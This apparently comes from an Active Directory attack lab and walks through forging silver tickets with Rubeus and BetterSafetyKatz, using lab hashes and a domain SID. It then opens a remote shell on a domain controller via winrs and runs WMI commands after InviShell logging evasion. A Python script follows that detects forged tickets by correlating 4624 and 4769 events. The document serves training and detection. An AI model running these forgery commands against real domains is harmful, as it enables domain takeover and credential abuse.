Task 1
Try to get command execution on the domain controller by creating a silver ticket for:
Use the NTLM or AES hash of dcorp-dc to forge and import a ticket:
Here, we use Rubeus for the HTTP service.
# ArgSplit for "silver"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
Since the ticket is imported, we can get a shell on the DC and execute commands.
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
C:\Users\Administrator>set username
set username
USERNAME=Administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
Let's also use SafetyKatz for WMI.
To access WMI, we need two tickets: one for HOST and another for RPCSS.
Let's get one for HOST first:
C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Now for RPCSS:
C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
We can now check that the tickets are imported using klist.
We can now run WMI commands on the DC.
# Run InviShell
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Run WMI command on DC
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
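From the defender's side, the property that gives a silver ticket away is that the forged service ticket never passes through the KDC, so the target host records a Kerberos network logon (4624) for which no DC ever logged a matching service-ticket issue (4769). The following correlation is an added example written for this page, not part of the lab or of Rubeus/SafetyKatz; the event records are constructed and simplified, and the 10-hour window assumes the default MaxTicketAge.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real log data). 4769 = service ticket issued by
# the KDC (read from every DC's Security log); 4624 = logon on the target host.
TGS_REQUESTS_4769 = [
    {"time": "2024-01-10 10:04:00", "user": "Administrator", "service": "http/dcorp-dc", "client": "::ffff:172.16.100.1"},
    {"time": "2024-01-10 10:04:02", "user": "Administrator", "service": "HOST/dcorp-dc", "client": "::ffff:172.16.100.1"},
]
LOGONS_4624 = [
    {"time": "2024-01-10 10:05:00", "user": "Administrator", "auth": "Kerberos", "type": 3, "client": "172.16.100.1"},
    # Kerberos logon with no ticket ever issued by a DC: the forged-ticket pattern
    {"time": "2024-01-10 14:40:00", "user": "Administrator", "auth": "Kerberos", "type": 3, "client": "172.16.100.50"},
    {"time": "2024-01-10 14:41:00", "user": "svcadmin", "auth": "NTLM", "type": 3, "client": "172.16.100.50"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def _ip(s):
    # 4769 ClientAddress is usually IPv4-mapped ("::ffff:a.b.c.d"); normalise it
    return s.split("::ffff:")[-1]


def find_unrequested_kerberos_logons(logons, tgs_requests, max_age=timedelta(hours=10)):
    """Return Kerberos network logons (4624, logon type 3) for which no DC issued
    a service ticket (4769) to the same account from the same client address
    within max_age before the logon. Such logons are candidates for a forged
    (silver) ticket and should be triaged."""
    flagged = []
    for logon in logons:
        if logon["auth"].lower() != "kerberos" or logon["type"] != 3:
            continue
        t = _ts(logon["time"])
        issued = any(
            r["user"].lower() == logon["user"].lower()
            and _ip(r["client"]) == _ip(logon["client"])
            and timedelta(0) <= t - _ts(r["time"]) <= max_age
            for r in tgs_requests
        )
        if not issued:
            flagged.append(logon)
    return flagged


if __name__ == "__main__":
    for hit in find_unrequested_kerberos_logons(LOGONS_4624, TGS_REQUESTS_4769):
        print("possible forged service ticket:", hit)
```

This only works if success auditing for Kerberos Service Ticket Operations is enabled and collected from every DC, and renewals (4770) would need to be folded into the window in a production version; note also that the /endin:600 /renewmax:10080 values used above match the domain defaults, so ticket lifetime alone is not a useful signal for these commands.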